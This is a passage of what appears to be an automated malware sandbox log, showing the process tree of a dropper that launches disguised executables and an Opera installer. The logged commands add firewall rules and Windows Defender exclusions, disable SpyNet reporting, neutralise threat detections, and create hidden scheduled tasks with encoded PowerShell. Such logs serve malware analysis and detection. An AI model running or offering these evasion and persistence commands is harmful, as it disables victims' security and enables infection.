C:\Users\Admin\Pictures\xiavoZITb0bNItqGrk4nZwtI.exe"C:\Users\Admin\Pictures\xiavoZITb0bNItqGrk4nZwtI.exe"4⤵PID:5000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1128
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3128
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2400
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:64
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:60
-
-
-
-
C:\Users\Admin\Pictures\ky27yZ6YV8xHp2SaBP1kgpLb.exe"C:\Users\Admin\Pictures\ky27yZ6YV8xHp2SaBP1kgpLb.exe"3⤵
- Executes dropped EXE
PID:4852
-
-
C:\Users\Admin\Pictures\XfyLoovFbzb13H8tHHG6a3c8.exe"C:\Users\Admin\Pictures\XfyLoovFbzb13H8tHHG6a3c8.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Users\Admin\AppData\Local\Temp\7zS1B53.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\7zS2DA3.tmp\Install.exe.\Install.exe /LzfYdidLoSR "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:1464
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:4612
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:1540
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:3260
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:4784
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:972
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:1468
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:3604
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKNiGZpEP" /SC once /ST 12:16:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKNiGZpEP"6⤵PID:4344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKNiGZpEP"6⤵PID:5096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\SmjAjGO.exe\" hp /WBsite_idvnl 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:4528
-
-
-
-
-
C:\Users\Admin\Pictures\QaJVKykb0dedK4BtDPMEdoFR.exe"C:\Users\Admin\Pictures\QaJVKykb0dedK4BtDPMEdoFR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:4608
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:4540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:5096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nse3546.tmpC:\Users\Admin\AppData\Local\Temp\nse3546.tmp4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nse3546.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:4812
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:1552
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 34765⤵
- Program crash
PID:4816
-
-
-
-
C:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exe"C:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exeC:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6ea29558,0x6ea29564,0x6ea295704⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3360
-
-
C:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exe"C:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4356 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240126190552" --session-guid=3ad48c1d-3d54-41cd-bb3f-5f901d5f7c1b --server-tracking-blob=NzM3ZGRkNTFjYTU0NDI1YWM3NDg0MWE0MjM3NWU0YWUwNzRjYjRlNmYzZjBkMTg3YWI2NGJmMTdkMzM5ZDczMTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNjI5NTk0MC44ODA4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4MDcxOWRjNS1jY2E3LTQ3YzMtOTBjZC1kYTYzZDc3NzIwZDEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=68050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exeC:\Users\Admin\Pictures\67yCS8RSVFzLiDd59SVZCjTv.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6d939558,0x6d939564,0x6d9395705⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\67yCS8RSVFzLiDd59SVZCjTv.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\67yCS8RSVFzLiDd59SVZCjTv.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:400
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x872614,0x872620,0x87262c5⤵PID:3108
-
-
-
-
C:\Users\Admin\Pictures\87z6LeGCVlh5OF7a0051UFO0.exe"C:\Users\Admin\Pictures\87z6LeGCVlh5OF7a0051UFO0.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:3224
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:632
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3036 -ip 30361⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\SmjAjGO.exeC:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\SmjAjGO.exe hp /WBsite_idvnl 385118 /S1⤵PID:1552
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4920
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3260
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1088
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3720
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4116
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DufnooWHNFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DufnooWHNFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IAvstfEYU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IAvstfEYU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNdNVmbTRKpEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNdNVmbTRKpEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gNEkwGGiCnIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gNEkwGGiCnIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cvDkMpEVJyabfeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cvDkMpEVJyabfeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 